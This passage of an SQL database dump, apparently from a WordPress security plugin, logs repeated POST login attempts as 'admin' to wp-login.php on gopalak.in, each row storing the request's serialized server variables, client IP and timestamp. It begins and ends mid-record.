Safari/614.31.14\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41698\";s:11:\"REMOTE_ADDR\";s:13:\"68.65.120.171\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744761239.0670111;s:12:\"REQUEST_TIME\";i:1744761239;}}','68.65.120.171',0,'2025-04-16 05:24:00','1970-01-01 00:00:00'),(93698,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f+9GVGLAnCAxO9Ag==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58014\";s:11:\"REMOTE_ADDR\";s:14:\"81.177.135.185\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744761957.6470029;s:12:\"REQUEST_TIME\";i:1744761957;}}','81.177.135.185',0,'2025-04-16 05:35:59','1970-01-01 00:00:00'),(93699,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f+9zNGLAnCAxULAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"95\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42256\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.126.68\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744762675.682816;s:12:\"REQUEST_TIME\";i:1744762675;}}','198.54.126.68',0,'2025-04-16 05:47:57','1970-01-01 00:00:00'),(93700,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f++f1GLAnCAxZZAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40598\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.126.68\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744763390.5170119;s:12:\"REQUEST_TIME\";i:1744763390;}}','198.54.126.68',0,'2025-04-16 05:59:52','1970-01-01 00:00:00'),(93701,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f+/MNGLAnCAxdcAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60352\";s:11:\"REMOTE_ADDR\";s:13:\"49.12.169.164\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744764099.327971;s:12:\"REQUEST_TIME\";i:1744764099;}}','49.12.169.164',0,'2025-04-16 06:11:41','1970-01-01 00:00:00'),(93702,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f+/4lGLAnCAxg7Ag==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50616\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.37\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744764809.6980331;s:12:\"REQUEST_TIME\";i:1744764809;}}','198.54.114.37',0,'2025-04-16 06:23:31','1970-01-01 00:00:00'),(93703,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f/AlpGLAnCAxlHAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60836\";s:11:\"REMOTE_ADDR\";s:11:\"195.7.5.237\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744765530.547035;s:12:\"REQUEST_TIME\";i:1744765530;}}','195.7.5.237',0,'2025-04-16 06:35:32','1970-01-01 00:00:00'),(93704,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f/BS9GLAnCAxrCAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60050\";s:11:\"REMOTE_ADDR\";s:13:\"104.43.93.163\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744766255.2554171;s:12:\"REQUEST_TIME\";i:1744766255;}}','104.43.93.163',0,'2025-04-16 06:47:37','1970-01-01 00:00:00'),(93705,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f/CAFGLAnCAxvqAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50490\";s:11:\"REMOTE_ADDR\";s:14:\"20.204.164.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744766977.3561389;s:12:\"REQUEST_TIME\";i:1744766977;}}','20.204.164.126',0,'2025-04-16 06:59:39','1970-01-01 00:00:00'),(93706,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f/CtNGLAnCAxz2Ag==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"32936\";s:11:\"REMOTE_ADDR\";s:14:\"66.102.133.111\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744767700.101063;s:12:\"REQUEST_TIME\";i:1744767700;}}','66.102.133.111',0,'2025-04-16 07:11:41','1970-01-01 00:00:00'),(93707,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f/Da5GLAnCAx4mAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35908\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.120.46\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744768431.4393389;s:12:\"REQUEST_TIME\";i:1744768431;}}','198.54.120.46',0,'2025-04-16 07:23:53','1970-01-01 